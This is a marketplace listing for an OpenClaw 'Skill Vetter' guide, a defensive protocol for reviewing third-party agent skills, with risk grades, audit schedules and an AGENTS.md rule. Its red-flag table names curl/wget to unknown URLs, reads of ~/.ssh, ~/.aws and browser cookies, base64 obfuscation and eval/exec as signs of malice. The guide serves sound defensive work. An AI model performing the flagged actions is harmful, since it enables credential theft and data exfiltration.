← 返回
未分类 中文

Skill Vetter Guide

Guide for vetting third-party OpenClaw skills before installation using the Skill Vetter security protocol. Use when installing any third-party skill, auditi...
在安装任何第三方 OpenClaw 技能前,使用 Skill Vetter 安全协议进行审查的指南。适用于审计...
vibesparkingai vibesparkingai 来源
未分类 clawhub v1.1.0 1 版本 100000 Key: 无需
★ 0
Stars
📥 482
下载
💾 0
安装
1
版本
#latest

概述

Skill Vetter Guide

Security-first protocol for vetting third-party OpenClaw skills before installation.

Core rule: Never install a skill without vetting it first.

Install Skill Vetter

Install to the user-global skills directory so all agents can use it:

~/.agents/skills/skill-vetter/

Source: useai-pro/openclaw-skills-security@skill-vetter on ClawHub, or the equivalent GitHub repo.

After installation, verify:

  1. Confirm ~/.agents/skills/skill-vetter/SKILL.md exists and is complete
  2. Check the skill appears in the agent's available skills list

Vetting SOP

When asked to install any third-party skill, follow this flow:

Discover skill → Fetch source → Review ALL files → Risk grade → Decide → Install & document

1. Check Source Metadata

  • Origin (ClawHub / GitHub / personal share)
  • Author, last update, stars/downloads, community feedback
  • Clear purpose statement

2. Full Code Review (Mandatory)

Review every file in the skill, not just SKILL.md. Check for these red flags:

Red FlagWhy It Matters
-------------------------
curl/wget to unknown URLsData exfiltration
Sending data to external serversPrivacy leak
Requesting tokens/API keys/credentialsCredential theft
Reading ~/.ssh, ~/.aws, ~/.configSensitive directory access
Reading MEMORY.md, USER.md, SOUL.md, IDENTITY.md, TOOLS.md, openclaw.config.jsonOpenClaw private file access
base64 decode of opaque contentObfuscation
eval()/exec() with external inputCode injection
Modifying files outside workspaceSystem tampering
Installing undeclared dependenciesSupply chain risk
IP address connections (not domains)Evasion of DNS-based controls
Minified/obfuscated code blocksHidden behavior
sudo/elevated permissionsPrivilege escalation
Accessing browser cookies/sessionsSession hijacking

3. Assess Permissions Scope

Determine what the skill reads, writes, executes, and whether it needs network access. Verify permissions are minimal and match stated functionality.

4. Assign Risk Level

LevelMeaningAction
------------------------
🟢 LOWLocal text/formatting/weatherInstall after review
🟡 MEDIUMFile ops, browser, third-party APIsInstall with caution
🔴 HIGHCredentials, system config, auto-sendHuman approval required
⛔ EXTREMERoot, security policy changes, broad sensitive readsDo not install

5. Output Vetting Report

Use the standard report format. See references/report-template.md.

6. Document Installation

After installing, record: date, skill name, source, risk level, review summary, install path.

Write to memory/YYYY-MM-DD.md or a dedicated security-audits/ directory.

Periodic Audit

Audit all installed third-party skills under ~/.agents/skills/ periodically:

  • Quick scan every 4 hours (automated via cron)
  • Full re-review weekly or monthly (human-assisted)

For each skill, check for new suspicious files, changed code, or newly introduced red flags.

Output status per skill: ✅ Normal / ⚠️ Needs attention / ❌ Problematic.

Write results to timestamped files: security-audits/skills-audit-YYYY-MM-DD_HHMM.md.

See references/audit-template.md for the audit file format.

AGENTS.md Enforcement

Add this rule to AGENTS.md to make vetting mandatory for all agents:

## Skill Security Rule

All third-party skills must be vetted with Skill Vetter before installation. No exceptions.

- Review ALL files, not just SKILL.md
- Check for: outbound network calls, sensitive file access, obfuscated code, eval/exec, credential requests, elevated permissions
- Output a standardized vetting report
- HIGH / EXTREME risk requires human approval
- Skills that fail vetting must not be installed

Prompt Templates

Ready-to-use prompts for common operations. See references/prompt-templates.md.

Multi-Instance Environments

When managing multiple OpenClaw instances:

  • Vet skills independently per machine
  • Record installed versions per host
  • Do not assume "safe on A = safe on B"
  • Leave audit trails when syncing or upgrading skills across hosts

版本历史

共 1 个版本

  • v1.1.0 当前
    2026-05-03 09:46 安全 安全

安全检测

腾讯云安全 (Keen)

安全,无风险
查看报告

腾讯云安全 (Sanbu)

安全,无风险
查看报告

🔗 相关推荐

it-ops-security

Free Ride - Unlimited free AI

shaivpidadi
管理OpenClaw的OpenRouter免费AI模型,自动按质量排名模型,配置速率限制备用方案,并更新opencla...
★ 472 📥 78,680
it-ops-security

MoltGuard - Security & Antivirus & Guardrails

thomaslwang
MoltGuard — OpenClaw 安全守卫,由 OpenGuardrails 提供。安装后可防止您和您的用户受到提示注入、数据泄露及恶意行为的侵害。
★ 116 📥 31,033
it-ops-security

OpenClaw Backup

alex3alex
备份与恢复 OpenClaw 数据。适用于创建备份、设置自动备份计划、从备份恢复或管理备份轮转。处理 ~/.openclaw 目录归档并包含适当的排除规则。
★ 90 📥 31,098